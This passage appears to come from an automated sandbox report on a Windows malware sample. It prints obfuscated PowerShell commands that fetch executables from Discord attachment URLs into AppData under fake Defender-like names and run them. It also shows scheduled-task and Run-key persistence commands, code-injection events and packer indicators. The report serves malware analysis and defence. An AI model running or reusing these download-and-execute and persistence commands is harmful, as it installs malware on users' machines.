HYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwApADwAIwB0AGcAeAAjAD4A" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAGsAeQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA3ADkAMwA3ADkAMgA4ADAAMgA5ADMANgAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAGUALgBlAHgAZQAnACwAIAA8ACMAaABhAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAGIAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHAAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApACkAPAAjAGcAcwB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcAB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApADwAIwBwAG4AeAAjAD4A" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAGQAagB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADEAOAA5ADYAMAAyADYANQAyADIAMgAxAC8ARgBpAGwAZQBNAGEAbgBhAGcAZQAuAGUAeABlACcALAAgADwAIwBpAG4AcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAYwBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcABnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAKQA8ACMAdwB6AG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBkAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAeQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAPAAjAGsAdwBqACMAPgA=" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAG0AcgBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA4ADkANQAyADAAMAAyADUAMQA5ADkANgAvAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcALAAgADwAIwB0AG0AdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AcgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAagBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcAKQApADwAIwBmAHIAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAHIAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBzAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARgBpAGwAZQBNAGEAbgBhAGcAZQByAC4AZQB4AGUAJwApADwAIwBnAHYAbAAjAD4A" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAHgAYQBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADYANgA2ADUANgA4ADEAMwAxADgANgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwAsACAAPAAjAHcAagBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBoAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAaQB0AHkALgBlAHgAZQAnACkAKQA8ACMAdAB1AHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABnAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwApADwAIwB1AGIAYwAjAD4A" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAGIAaQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADEAMwA4ADEANgA5ADgAMwA2ADQAMgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcALAAgADwAIwByAGwAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHUAbQBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAdgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQApADwAIwBjAGsAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGQAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAdAB5AC4AZQB4AGUAJwApADwAIwBmAHUAcgAjAD4A" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAGcAawBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA3ADkAOAA1ADcAMQA4ADYANAAxADMANAAvAHUAYgBuAGEAbgAuAGUAeABlACcALAAgADwAIwBzAGgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAZgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAegBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMANQAwADAAdQBiAG4AYQBuAC4AZQB4AGUAJwApACkAPAAjAHkAbgBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAdABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGwAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTADUAMAAwAHUAYgBuAGEAbgAuAGUAeABlACcAKQA8ACMAcwBoAHcAIwA+AA==" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAHgAZwBjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADUANgAwADIAOQA2ADYAMQAyADgANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAGUALgBlAHgAZQAnACwAIAA8ACMAdABjAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AHMAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHMAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAKQApADwAIwBnAHAAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAHIAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeAB5AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHkAcgBsACMAPgA=" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAGwAbABiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADkAMgAxADUAOQA0ADAAOAAxADcAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaAB4AGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAC4AZQB4AGUAJwApACkAPAAjAHoAaQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AaQBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMALgBlAHgAZQAnACkAPAAjAHkAeABsACMAPgA=" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAGwAdwBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADMANQA5ADkANAAxADcAMgAyADEANgAyAC8AUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACwAIAA8ACMAZABnAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHAAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGYAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABvAHMAdAAuAGUAeABlACcAKQApADwAIwB2AGgAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGQAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABwAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACkAPAAjAHUAYgBoACMAPgA=" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAGUAYgB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA0ADIAOQAyADUANQAwADEAMgA0ADUAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcALAAgADwAIwBiAGIAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbgBqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAaQBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcAKQApADwAIwBlAGsAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHAAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABwAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AC4AZQB4AGUAJwApADwAIwBwAGoAdgAjAD4A" filepath: powershell	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAG4AYgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADQAOAAwADYANAA1ADMAOAA2ADMANgAxAC8AVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwAsACAAPAAjAGcAawBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdQBiAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwApACkAPAAjAGIAYwBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAdQBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AGsAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACkAPAAjAGwAbgBlACMAPgA=" filepath: powershell	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00042400', u'virtual_address': u'0x00002000', u'entropy': 7.928198748348251, u'name': u'.text', u'virtual_size': u'0x00042254'}

entropy

7.92819874835

description

A section with a high entropy has been found

entropy

0.870279146141

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (13 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Nov. 8, 2022, 9:35 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 8, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (17 events)

description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	"cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2732 region_size: 258048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000020c	1	0	0
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 3044 region_size: 159744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000244	1	0	0

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WIndowShellHost	reg_value	C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe
cmdline	schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	"cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

Potential code injection by writing to the memory of another process (6 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $FÍÎQ¬ ¬ ¬ mÚ>¬ mÚ F¬ mÚ¬ Ô3¬ ¬¡V¬ mÚ¬ mÚ=¬ Rich¬ PELÀ0Nà z&H2@ðÂ@»<ðhÐÐä `H²@$.textBxz `.rdata12~@@.dataÐ°@À.rsrchÐðÒ¾@@.relocªÐ@B base_address: 0x00400000 process_identifier: 2732 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 8, 2022, 9:35 a.m.	buffer: Ä@.?AVlogic_error@std@@Ä@.?AVlength_error@std@@Ä@.?AVout_of_range@std@@Ä@.?AVtype_info@@Næ@»±¿Dÿÿÿÿÿÿÿÿ ! 5A CPR S WYl m pr ) ¡¤§ ·Î×Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@Wb@ÿÿÿÿ C§@§@§@\|§@x§@t§@p§@h§@`§@X§@L§@@§@8§@,§@(§@$§@ §@§@§@§@§@§@§@§@§@ü¦@ô¦@è¦@à¦@Ø¦@§@Ð¦@È¦@À¦@´¦@¬¦@ ¦@¦@¦@¦@¦@l¦@`¦@ X¦@P¦@H¦@@¦@8¦@0¦@(¦@¦@¦@ø¥@ä¥@Ð¥@À¥@¬¥@¤¥@¥@¥@¥@¥@\|¥@t¥@l¥@d¥@\¥@T¥@L¥@<¥@(¥@¥@¥@¥@¥@ø¤@è¤@Ô¤@Ä¤@°¤@¤@¤@¤@x¤@P¤@<¤@ Ó@ Ó@ Ó@ Ó@ Ó@8Û@©@@¯@¨Ó@Õ@ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZðÕ@¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ 